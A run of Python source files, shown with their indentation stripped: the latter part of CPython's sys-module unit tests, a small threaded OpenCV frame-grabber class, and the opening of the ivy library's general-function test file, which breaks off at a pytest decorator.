self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
# Output of sys._debugmallocstats() depends on configure flags.
# The sysconfig vars are not available on Windows.
if sys.platform != "win32":
with_freelists = sysconfig.get_config_var("WITH_FREELISTS")
with_pymalloc = sysconfig.get_config_var("WITH_PYMALLOC")
if with_freelists:
self.assertIn(b"free PyDictObjects", err)
if with_pymalloc:
self.assertIn(b'Small block threshold', err)
if not with_freelists and not with_pymalloc:
self.assertFalse(err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
def test_stdlib_dir(self):
os = import_helper.import_fresh_module('os')
marker = getattr(os, '__file__', None)
if marker and not os.path.exists(marker):
marker = None
expected = os.path.dirname(marker) if marker else None
self.assertEqual(os.path.normpath(sys._stdlib_dir),
os.path.normpath(expected))
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_exception_qualname(self):
# See bpo-41031, bpo-45083.
# Check that the exception is printed with its qualified name
# rather than just classname, and the module names appears
# unless it is one of the hard-coded exclusions.
class A:
class B:
class X(Exception):
pass
for moduleName in 'builtins', '__main__', 'some_module':
with self.subTest(moduleName=moduleName):
A.B.X.__module__ = moduleName
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
expected = self.write_unraisable_exc(
A.B.X(), "msg", "obj");
report = stderr.getvalue()
self.assertIn(A.B.X.__qualname__, report)
if moduleName in ['builtins', '__main__']:
self.assertNotIn(moduleName + '.', report)
else:
self.assertIn(moduleName + '.', report)
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('6Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('6Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('6Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('6Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
def func():
return sys._getframe()
x = func()
check(x, size('3Pi3c8P2iciP'))
# function
def func(): pass
check(func, size('14Pi'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2P4P4c8P2iciP'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn12PIP'
s = vsize('2P' + fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'6P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 32 + 21*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 15*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 32 + 21*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 13*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
VideoGet.py
|
from threading import Thread
import cv2
class VideoGet:
"""
Class that continuously gets frames from a VideoCapture object
with a dedicated thread.
"""
def __init__(self, src=0):
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
def start(self):
Thread(target=self.get, args=()).start()
return self
def get(self):
while not self.stopped:
if not self.grabbed:
self.stop()
else:
cv2.waitKey(5)
(self.grabbed, self.frame) = self.stream.read()
def stop(self):
self.stopped = True
|
test_general.py
|
"""
Collection of tests for unified general functions
"""
# global
import os
import math
import time
import einops
import pytest
import threading
import numpy as np
from numbers import Number
from collections.abc import Sequence
import torch.multiprocessing as multiprocessing
# local
import ivy
import ivy.functional.backends.numpy
import ivy.functional.backends.jax
import ivy.functional.backends.tensorflow
import ivy.functional.backends.torch
import ivy.functional.backends.mxnet
import ivy_tests.test_ivy.helpers as helpers
# Helpers #
# --------#
def _get_shape_of_list(lst, shape=()):
if not lst:
return []
if not isinstance(lst, Sequence):
return shape
if isinstance(lst[0], Sequence):
l = len(lst[0])
if not all(len(item) == l for item in lst):
msg = 'not all lists have the same length'
raise ValueError(msg)
shape += (len(lst),)
shape = _get_shape_of_list(lst[0], shape)
return shape
# Tests #
# ------#
# set_framework
@pytest.mark.parametrize(
